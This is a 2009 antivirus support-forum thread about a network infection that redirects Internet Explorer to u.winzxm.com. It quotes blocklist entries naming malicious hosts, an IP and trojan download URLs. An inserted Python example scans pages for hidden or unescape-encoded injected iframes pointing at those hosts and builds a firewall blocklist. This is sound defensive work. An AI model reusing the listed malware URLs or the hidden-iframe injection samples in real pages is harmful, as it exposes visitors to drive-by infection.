Undetected by Eset u.winzxm.com

Discussion in 'ESET NOD32 Antivirus' started by Denny Lasaath, Apr 11, 2009.

Thread Status:
Not open for further replies.
  1. Denny Lasaath

    Denny Lasaath Registered Member

    Joined:
    Sep 9, 2006
    Posts:
    14
    Compromised a whole network of computers. Have the latest version of Eset, 4.0.417. Full scan, no infection. It is currently being detected by One Care when the browser tries to access the site.

    When trying to connect to Windows Update, it connects to u.winzxm.com and tries to install an ActiveX control. After trying to install the ActiveX, it hangs IE.
    Hosts file is clean, DNS is clean. Entered the Microsoft Windows Update IP manually in the browser, still the same results.

    Please see the attached pics of the site it connects to.

    http://mtgrescue.com/1.JPG
    http://mtgrescue.com/2.JPG
    http://mtgrescue.com/3.JPG
    http://mtgrescue.com/4.JPG
    http://mtgrescue.com/activex.JPG
    http://mtgrescue.com/onecare.JPG
    http://mtgrescue.com/onecare1.JPG

    Scan Logs
    http://mtgrescue.com/SysInspector-DDZ1Y5H1-090411-1014.zip
    http://mtgrescue.com/4102009.xml

    Info from Malware domain list.
    http://www.malwaredomainlist.com/mdl.php?search=61.152.144.85&colsearch=All&quantity=50

    2009/04/08_00:00 j.winxyz.com/win/j/index.htm 61.152.144.85 - exploits zengcheng kirazxm@qq.com
    2009/04/08_00:00 m.winxyz.com 61.152.144.85 - redirects to exploits zengcheng kirazxm@qq.com
    2009/01/21_12:00 u.winzxm.com 61.152.144.85 - exploits winzxm@qq.com
    2009/04/08_00:00 winxyz.com/win/j.exe 61.152.144.85 - trojan zengcheng kirazxm@qq.com
    2009/04/08_00:00 winzxm.com/win/u.exe 61.152.144.85 - trojan zengcheng winzxm@qq.com
     
    Last edited: Apr 11, 2009
  2. dorgane

    dorgane Registered Member

    Joined:
    Oct 17, 2007
    Posts:
    362
    Last edited: Apr 11, 2009
  3. Denny Lasaath

    Denny Lasaath Registered Member

    Joined:
    Sep 9, 2006
    Posts:
    14
    Not sure what steps to take; it pretty much hangs IE. Does not affect Firefox.
     
  4. dannyboy

    dannyboy Registered Member

    Joined:
    Jul 21, 2005
    Posts:
    113
    Location:
    UK
    you should not post links to malware here, please edit your post
     
    Last edited: Apr 11, 2009
  5. funkydude

    funkydude Registered Member

    Joined:
    Apr 5, 2004
    Posts:
    6,852
    I like how you say that yet you quoted the link :D
     
  6. dannyboy

    dannyboy Registered Member

    Joined:
    Jul 21, 2005
    Posts:
    113
    Location:
    UK
    and edited it about 60 secs afterwards :rolleyes:
     
  7. Thankful

    Thankful Savings Monitor

    Joined:
    Feb 28, 2005
    Posts:
    3,731
    Location:
    New York City
    Please edit/remove link to Virustotal as this is also a violation of TOS.
    Thanks.
     
  8. dannyboy

    dannyboy Registered Member

    Joined:
    Jul 21, 2005
    Posts:
    113
    Location:
    UK
    shouldn't you also be asking the person who actually posted these links? :mad:
     
  9. Thankful

    Thankful Savings Monitor

    Joined:
    Feb 28, 2005
    Posts:
    3,731
    Location:
    New York City
    The original link was removed by moderator. You then quoted the links, thereby copying them.
     
  10. dannyboy

    dannyboy Registered Member

    Joined:
    Jul 21, 2005
    Posts:
    113
    Location:
    UK
    the user him/herself removed them, but only in the last couple of minutes. Yes I understand how quoting works thanks.
     
  11. Thankful

    Thankful Savings Monitor

    Joined:
    Feb 28, 2005
    Posts:
    3,731
    Location:
    New York City
    Actually, the moderator removed the link to Virustotal, after I alerted him/her.
     
  12. Denny Lasaath

    Denny Lasaath Registered Member

    Joined:
    Sep 9, 2006
    Posts:
    14
    Any suggestions for Eset to help?
     
  13. Denny Lasaath

    Denny Lasaath Registered Member

    Joined:
    Sep 9, 2006
    Posts:
    14
  14. nanana1

    nanana1 Frequent Poster

    Joined:
    Jun 22, 2007
    Posts:
    947
    On Sunday ?:p
     
  15. Denny Lasaath

    Denny Lasaath Registered Member

    Joined:
    Sep 9, 2006
    Posts:
    14
    You would be concerned if your clients were at risk from this. Imagine your network was infected by this ;) Asking for help because we want Eset to be the first to detect it. :thumb:
     
  16. bradtech

    bradtech Guest

    Submit some samples to ESET or call them directly. It usually takes 3 days before I hear back if I email or leave messages.
     
  17. Denny Lasaath

    Denny Lasaath Registered Member

    Joined:
    Sep 9, 2006
    Posts:
    14
    Not sure what to submit; Eset is not finding anything, nor do we know which file is causing it. When trying to visit any Microsoft website, it redirects itself to u.winzxm.com. Currently Windows One Care detects it when it is trying to download from u.winzxm.com. Temp fix is to block access to winzxm.com on our firewall. We contacted Eset on Friday; they called back, but we have to wait until Monday for help.
     
  18. GAN

    GAN Registered Member

    Joined:
    Mar 3, 2007
    Posts:
    355
    Just submit the URL and the information you already got that could help Eset to understand and fix this issue.
     
  19. GrammatonCleric

    GrammatonCleric Registered Member

    Joined:
    Jan 8, 2009
    Posts:
    372

    Wait, are you actually expecting ESET to respond to any emergency on a weekend? Any weekend o_O and ESPECIALLY EASTER SUNDAY o_O?? :eek: :eek: :eek:
    ~Comment removed.~

    FYI, the Monday after Easter Sunday is also a national holiday in some Eastern European countries. (Most kids are running around dumping buckets of water on each other.)

    Get in contact with CA support directly.
     
    Last edited by a moderator: Apr 13, 2009
  20. Marcos

    Marcos Eset Staff Account

    Joined:
    Nov 22, 2002
    Posts:
    14,374
    I'd suggest sending all files marked red in the SysInspector log in an archive protected with the password "infected" to samples[at]eset.com with this thread's url in the subject.
     
  21. sir_carew

    sir_carew Registered Member

    Joined:
    Sep 2, 2003
    Posts:
    884
    Location:
    Santiago, Chile
    Hi,
    The malware at the links you posted is now detected by NOD32 as u.exe - Win32/PSW.Gamania.NBN trojan and E:\index.htm - JS/TrojanDownloader.Iframe.NDY trojan.

     
  22. Denny Lasaath

    Denny Lasaath Registered Member

    Joined:
    Sep 9, 2006
    Posts:
    14
    Looks like that is today's definitions, hopefully it finds something.
     
  23. SteveFromPB

    SteveFromPB Registered Member

    Joined:
    Apr 16, 2009
    Posts:
    1
    Location:
    San Diego, CA
    Denny -

    any luck on this? I'm having the same problem on my small office network, every client has some Javascript installed (js_shellcode.br) that forces Internet Explorer to try to download a file (expl_iframebo.a) from u.winzxm.com. My antivirus is TrendMicro, and it's blocking the download of the exploit object, but I can't seem to remove the Javascript. It tries to run in Firefox/Chrome/Safari as well but doesn't seem to work. Unfortunately, a good deal of the modern world doesn't deem it necessary to make their sites compatible with anything but IE.

    If you've found anything in your searching, please let me know.
     
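    The following is an added example, not code from the thread, from ESET or from any of the posters. It takes the five Malware Domain List rows quoted in post 1 as the indicator source, and scans page content for the kind of injected iframe/script that post 23 describes (a page on every client forcing IE to fetch from u.winzxm.com), including the common document.write(unescape(...)) wrapper that hides the iframe from a naive text search. The HTML below is constructed for the example, not captured from an infected machine; the Finding/Indicators names and the blocklist helper (for the firewall block mentioned in post 17) are this example's own.

```python
"""Added example: turn quoted Malware Domain List rows into an indicator set,
scan HTML/JS for injected iframes or scripts pointing at those indicators,
and emit a blocklist for a perimeter firewall. Sample inputs are constructed."""
import re
from dataclasses import dataclass
from urllib.parse import unquote

# The five MDL rows exactly as quoted in post 1 of the thread.
# Columns: date, URL, IP, "-", description, registrant, contact e-mail.
MDL_ROWS = """\
2009/04/08_00:00 j.winxyz.com/win/j/index.htm 61.152.144.85 - exploits zengcheng kirazxm@qq.com
2009/04/08_00:00 m.winxyz.com 61.152.144.85 - redirects to exploits zengcheng kirazxm@qq.com
2009/01/21_12:00 u.winzxm.com 61.152.144.85 - exploits winzxm@qq.com
2009/04/08_00:00 winxyz.com/win/j.exe 61.152.144.85 - trojan zengcheng kirazxm@qq.com
2009/04/08_00:00 winzxm.com/win/u.exe 61.152.144.85 - trojan zengcheng winzxm@qq.com
"""

# Constructed test page (hypothetical): one real-looking script, one 0x0 iframe to a
# listed host, one hidden iframe to an unlisted host, and an iframe assembled at
# runtime through unescape() so the raw text never contains "<iframe".
SAMPLE_PAGE = """<html><body>
<script src="http://update.microsoft.com/real.js"></script>
<iframe src="http://u.winzxm.com/win/u/index.htm" width=0 height=0 frameborder=0></iframe>
<iframe src="http://ads.example.net/x.htm" style="display:none"></iframe>
<script>document.write(unescape('%3Ciframe src=%22http://61.152.144.85/win/j/index.htm%22 width=1 height=1%3E%3C/iframe%3E'));</script>
</body></html>"""


@dataclass(frozen=True)
class Indicators:
    hosts: frozenset    # full hostnames from the list, e.g. u.winzxm.com
    domains: frozenset  # registrable domains, so unlisted subdomains are caught too
    ips: frozenset      # hosting IPs, for pages that reference the server by address


def parse_mdl(text: str) -> Indicators:
    """Second column is a URL without scheme; strip the path to get the host."""
    hosts, domains, ips = set(), set(), set()
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        host = parts[1].split("/")[0].lower()
        hosts.add(host)
        domains.add(".".join(host.split(".")[-2:]))  # two-label registrable domain
        ips.add(parts[2])
    return Indicators(frozenset(hosts), frozenset(domains), frozenset(ips))


TAG_RE = re.compile(r"<(iframe|script|object|embed)\b([^>]*)>", re.I)
SRC_RE = re.compile(r"""src\s*=\s*["']?\s*([^"'\s>]+)""", re.I)
HIDDEN_RE = re.compile(
    r"""(?:width|height)\s*=\s*["']?0\b|display\s*:\s*none|visibility\s*:\s*hidden""", re.I)
HOST_RE = re.compile(r"^(?:https?:)?//([^/:?#]+)", re.I)


def url_host(url: str):
    m = HOST_RE.match(url.strip())
    return m.group(1).lower() if m else None


def matches(host, ioc: Indicators) -> bool:
    """True if host is a listed host/IP or sits under a listed registrable domain."""
    if not host:
        return False
    if host in ioc.hosts or host in ioc.ips:
        return True
    return any(host == d or host.endswith("." + d) for d in ioc.domains)


@dataclass(frozen=True)
class Finding:
    tag: str
    src: str
    reason: str


def scan_html(content: str, ioc: Indicators) -> list:
    """Scan the raw text and a percent-decoded view of it, so iframes written via
    document.write(unescape('%3Ciframe ...')) are seen as well. Deduplicated."""
    seen = {}
    for view in (content, unquote(content)):
        for m in TAG_RE.finditer(view):
            tag, attrs = m.group(1).lower(), m.group(2)
            srcm = SRC_RE.search(attrs)
            src = srcm.group(1) if srcm else ""
            if matches(url_host(src), ioc):
                f = Finding(tag, src, "references known malicious host")
            elif tag == "iframe" and HIDDEN_RE.search(attrs):
                f = Finding(tag, src, "hidden iframe (0x0 or display:none)")
            else:
                continue
            seen.setdefault(f, f)
    return list(seen.values())


def to_blocklist(ioc: Indicators) -> list:
    """Registrable domains first, then IPs: what a firewall deny rule needs."""
    return sorted(ioc.domains) + sorted(ioc.ips)


if __name__ == "__main__":
    ioc = parse_mdl(MDL_ROWS)
    for f in scan_html(SAMPLE_PAGE, ioc):
        print(f"{f.tag:7} {f.reason:40} {f.src}")
    print("blocklist:", ", ".join(to_blocklist(ioc)))
```

Blocking at the registrable domain rather than only u.winzxm.com matters because the list already shows several subdomains of the same two domains on one IP; the unlisted hidden iframe is reported separately because a 0x0 frame to any host is worth a look even when it is not yet on a list.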
  24. GAN

    GAN Registered Member

    Joined:
    Mar 3, 2007
    Posts:
    355
    This is the support forum for Eset products, so in your case you should check out a support forum for Trend products if Trend is not able to detect or remove an infection. Unless you use Eset NOD32, I don't think this is the right place to ask why your antivirus software does not block/remove an infection. The solution provided here will most likely be of no help to you, since you do not use an antivirus product from Eset.
     
  25. dshelton

    dshelton Registered Member

    Joined:
    May 11, 2009
    Posts:
    1
    Does Eset solve this problem now? I ran the trial nod32 on 4/21/09 and so far no such luck.
     